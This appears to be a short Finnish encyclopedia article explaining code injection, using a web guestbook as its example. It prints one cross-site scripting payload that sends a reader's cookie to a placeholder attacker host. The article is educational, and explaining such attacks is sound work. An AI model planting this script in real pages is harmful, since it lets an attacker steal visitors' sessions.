Tunkeutuminen (tietotekniikka)
Tunkeutuminen (koodi-injektio) on tietokoneen ohjelmavirhe, jollaisen aiheuttaa epäkelpo tieto. Hyökkääjä voi käyttää tunkeutumista lisätäkseen koodia tietokoneohjelmaan muuttaakseen ohjelman tekemiä toimenpiteitä (suoritusta). Hyökkäyksen tulos voi olla tuhoisa. Tunkeutumista käytetään hyväksi esimerkiksi tietokonemadoissa.
Yleistä ja esimerkki[muokkaa | muokkaa wikitekstiä]
WWW-palvelimella on vieraskirja skriptinä. Se ottaa vastaan pieniä viestejä käyttäjiltä. Usein viestit ovat muotoa
Nice site!
Vihamielinen hyökkääjä voi tuntea vieraskirjan tietoturvahaavoittuvuuden ja lisää esimerkiksi seuraavankaltaisen viestin:
Nice Site, I think I'll take it.><script>document.location='http://some_attacker/cookie.cgi?' +document.cookie</script>
Kun toinen ihminen lukee vieraskirjaa ja tulee tälle sivulle, hänen tietokoneensa suorittaa lisätyn koodin. Koodi voi personoida hänet hyökkääjäksi. Joka tapauksessa tämä ohjelmavirhe voi aiheuttaa pahaa-aavistamattomalle sivun lukijalle vääristeltyä HTML-koodia.
That post was awesome, :>)
Tässä tapauksessa hymiö tekee HTML-koodin epävaliidiksi, koska koodiin on lisätty väärinmuodostettu HTML-tunniste (tag).